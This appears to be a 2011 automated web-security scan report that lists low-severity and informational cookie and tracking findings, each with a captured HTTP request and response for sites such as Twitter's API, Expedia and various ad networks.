HTTP/1.1 302 Moved Temporarily Server: Sun-Java-System-Web Date: Fri, 06 May 2011 22:33:42 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Pragma: no-cache Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT Location: http://.a4916f41be22b8b64 Content-length: 0 Connection: close |
Severity: | Low |
Confidence: | Firm |
Host: | http://api.twitter.com |
Path: | /1/statuses/user_timeline |
GET /1/statuses/user_timeline Host: api.twitter.com Proxy-Connection: keep-alive Referer: http://api.twitter.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* X-PHX: true Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=13031416680 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:40:09 GMT Server: hi Status: 200 OK X-Transaction: 1304703609-30473-34243 X-RateLimit-Limit: 1000 ETag: "07cee35ad36c4b6979a Last-Modified: Fri, 06 May 2011 17:40:09 GMT X-RateLimit-Remaining: 997 X-Runtime: 0.02318 X-Transaction-Mask: a6183ffa5f8ca943ff1b Content-Type: application/json; charset=utf-8 Pragma: no-cache X-RateLimit-Class: api_phoenix X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-MID: c9c59e83fb5603f4fb8e X-RateLimit-Reset: 1304707199 Set-Cookie: original_referer Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7Cj Vary: Accept-Encoding Connection: close Content-Length: 36346 {"statuses":[{"text":"Is it possible that I am feeling socially inadequate?","coordinates ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.clone-systems |
Path: | /ecommerce/ |
GET /ecommerce/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RECENTLY_VIEWED_PRODUCTS |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:47:46 GMT Server: Apache Set-Cookie: SHOP_SESSION_TOKEN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 28692 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xml:lang="en" lang="en" xmlns="http://www.w3.org <head> ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.clone-systems |
Path: | /ecommerce/index.php |
GET /ecommerce/index.php Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.clone-systems.com |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:54:49 GMT Server: Apache Set-Cookie: SHOP_SESSION_TOKEN Expires: Sat, 14 May 2011 00:54:50 +0000 Cache-Control: public,maxage=604800 Pragma: public Content-Length: 190 Content-Type: text/javascript var img = new Image(1, 1); img.src = 'http://www.clone-systems img.onload = function() { return true; }; |
Severity: | Low |
Confidence: | Firm |
Host: | https://www.clone-systems |
Path: | /ecommerce/index.php |
GET /ecommerce/index.php Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: www.clone-systems.com Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:55:30 GMT Server: Apache Set-Cookie: SHOP_SESSION_TOKEN Expires: Sat, 14 May 2011 00:55:30 +0000 Cache-Control: public,maxage=604800 Pragma: public Content-Length: 191 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var img = new Image(1, 1); img.src = 'https://www.clone img.onload = function() { return true; }; |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /Hotels |
GET /Hotels HTTP/1.1 Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Date: Fri, 06 May 2011 22:42:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/ Set-Cookie: JSESSION=ed861fe0-7e58 Set-Cookie: s1=`0; Domain=.expedia.com; Path=/ Set-Cookie: p1=`gacct=v.1,1,215819496 Content-Length: 133396 <!DOCTYPE html> <html> <head> <meta name="language" content="en_US"/> <meta name="robots" content="noydir, noodp"/> <title>Hotels: Find cheap hotel deals & resorts, make hotel reservations | E ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.lbmc.com |
Path: | /about_us |
GET /about_us HTTP/1.1 Host: www.lbmc.com Proxy-Connection: keep-alive Referer: http://www.lbmc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=224675399 |
HTTP/1.1 301 Moved Permanently Date: Sat, 07 May 2011 01:14:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 Set-Cookie: SESS083a1ac464c2b3bb Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 07 May 2011 01:14:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Location: http://www.lbmc.com/about Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.trpcweb.com |
Path: | / |
GET / HTTP/1.1 Host: www.trpcweb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: store, no-cache, must-revalidate,post Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 07 May 2011 01:37:01 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.14 Set-Cookie: SESS965ff70c2c038017 X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:37:02 GMT Content-Length: 33980 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.adonion.com |
Path: | /serving/tracking_id.php |
GET /serving/tracking_id.php Host: ads.adonion.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:03:52 GMT Server: Apache/2.2.17 (Fedora) X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Cache-Control: no-cache, must-revalidate Set-Cookie: TRUID=13047194394361; expires=Sun, 05-Jun-2011 22:03:52 GMT; path=/; domain=.adonion.com Set-Cookie: CKTIME=1304719432; expires=Thu, 01-Mar-2012 22:03:52 GMT; path=/; domain=.adonion.com Content-Length: 0 Connection: close Content-Type: image/png |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/media.expedia.com |
GET /is/media.expedia.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-EB6E52171CD |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://media.expedia.com Expires: Fri, 06 May 2011 22:33:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 06 May 2011 22:33:42 GMT Connection: close Set-Cookie: 01AI=2-2-98657543520 P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/16228-124632-16454 |
GET /ad/js/16228-124632-16454 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Set-Cookie: mojo3=16228:16454/10105 Location: http://img.mediaplex.com Content-Length: 0 Date: Fri, 06 May 2011 21:50:11 GMT |
Severity: | Information |
Confidence: | Certain |
Host: | http://as.casalemedia.com |
Path: | /j |
GET /j?s=120511&u=&a=5&id Host: as.casalemedia.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CMD2=AAEoyE2yFpUAAda |
HTTP/1.1 200 OK Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/javascript Expires: Fri, 06 May 2011 20:28:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 06 May 2011 20:28:10 GMT Content-Length: 179 Connection: close Set-Cookie: CMID=5w153q3LtckAAEY Set-Cookie: CMPS=061;domain Set-Cookie: CMPP=006;domain Set-Cookie: CMSC=TcRZ2g**;domain Set-Cookie: CMD3=AAFJfU3EWdoAAda document.write('<iframe src="http://cdn.optmd.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /b?c1=2&c2=6402952&rn Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.linkedin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 204 No Content Content-Length: 0 Date: Fri, 06 May 2011 17:41:20 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
GET /r?c2=6035740&d.c=gif&d.o Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Fri, 06 May 2011 18:39:03 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action=add Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pb_rtb_ev=1:535495 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web84 Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Mon, 30-Apr-2012 22:33:36 GMT; Path=/ Set-Cookie: cwbh1=541%3B05%2F24 Content-Type: image/gif Date: Fri, 06 May 2011 22:33:35 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cf.addthis.com |
Path: | /red/p.json |
GET /red/p.json?rb=2&gen=1000 Host: cf.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Expires: Sat, 07 May 2011 01:17:42 GMT Set-Cookie: di=1304471550.60 P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 06-Jun-2011 01:17:42 GMT; Path=/ Content-Type: text/javascript Content-Length: 161 Date: Sat, 07 May 2011 01:17:41 GMT Connection: close _ate.ad.hrr({"urls":[ |
Severity: | Information |
Confidence: | Certain |
Host: | http://clk.atdmt.com |
Path: | /AVE/go/173511812AD5 |
GET /AVE/go/173511812AD5 Host: clk.atdmt.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465 |
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.secureworks P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: ach00=903d/120af:fb75 Set-Cookie: ach01=2a0cb15/120af Date: Sat, 07 May 2011 01:22:03 GMT Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=2546&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 302 Found Date: Fri, 06 May 2011 22:06:08 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Cache-Control: private Set-Cookie: sapha_2546_1=68004 Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=1&NS_sw Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 302 Found Date: Fri, 06 May 2011 22:05:33 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Cache-Control: private Set-Cookie: sapha_1_19=110076 Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /pxj |
GET /pxj?bidder=55&action Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChII-sEBEAoYCiAKKAowg |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 08-May-2011 11:30:47 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfu=8fG10Qgj[2<?0P( Content-Length: 43 Content-Type: image/gif Date: Sat, 07 May 2011 11:30:47 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /seg |
GET /seg?add_code=impx-11262 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://allatsea.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChII-sEBEAoYCiAKKAowg |
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 21:06:48 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfu=8fG2<rgj[2<?0P( Location: http://view.atdmt.com Date: Fri, 06 May 2011 21:06:48 GMT Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAG_sa57v |
GET /verify/EAAAAG_sa57v Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=46=E_SNEpllEIM0 |
HTTP/1.1 200 OK Set-Cookie: NID=46=Ay0e2w2n3jC-m Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Sat, 07 May 2011 01:15:24 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAOVhf5VM |
GET /verify/EAAAAOVhf5VM Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=46=0q_cRlN3FaLT |
HTTP/1.1 200 OK Set-Cookie: SNID=46=E_SNEpllEIM0 Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Fri, 06 May 2011 23:25:37 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/advancedaccess/safe |
GET /js/advancedaccess/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=wmi0souExiDc;Path=/ Content-Length: 2851 Date: Fri, 06 May 2011 18:39:55 GMT Connection: close var psdTmJsid = "wmi0souExiDc"; // safe-monitor@gecko.js var psdTmJiso; try { psdTmJiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psdTmJwid != null); } catch(e) { psdTmJi ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/charlesw/safe |
GET /js/charlesw/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.eneighborhoods User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=Oq0ITgZJuzSN;Path=/ Content-Length: 5069 Date: Fri, 06 May 2011 18:39:54 GMT Connection: close var psu2TYsid = "Oq0ITgZJuzSN"; // safe-standard@gecko.js var psu2TYiso; try { psu2TYiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psu2TYwid != null); } catch(e) { psu2TY ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://int.teracent.net |
Path: | /tase/int |
GET /tase/int?adv=206&fmt Host: int.teracent.net Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=Mwf8VEP.X2PRIV; imp=a$le#1303349159766 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: p206r=b$u-3#5.7VA|c-2002 Set-Cookie: imp=a$le#1304733038729 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Expires: Sat, 6 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-Type: image/gif Content-Length: 43 Date: Sat, 07 May 2011 01:50:38 GMT Connection: close GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://leadback |
Path: | /adcedge/lb |
GET /adcedge/lb?site=695501 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=aw960013034229720018 |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 22:33:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=AdHxN5pqEIxFGpgov Set-Cookie: GUID=MTMwNDcyMTIxNjs Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Fri, 06 May 2011 23:33:36 GMT Content-Type: image/gif Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://m.adnxs.com |
Path: | /msftcookiehandler |
GET /msftcookiehandler?t=1&c Host: m.adnxs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChII-sEBEAoYCiAKKAowg |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 20:02:53 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Content-Length: 43 Content-Type: image/gif Date: Fri, 06 May 2011 20:02:53 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://media.expedia.com |
Path: | /media/content/expus |
GET /media/content/expus Host: media.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511 |
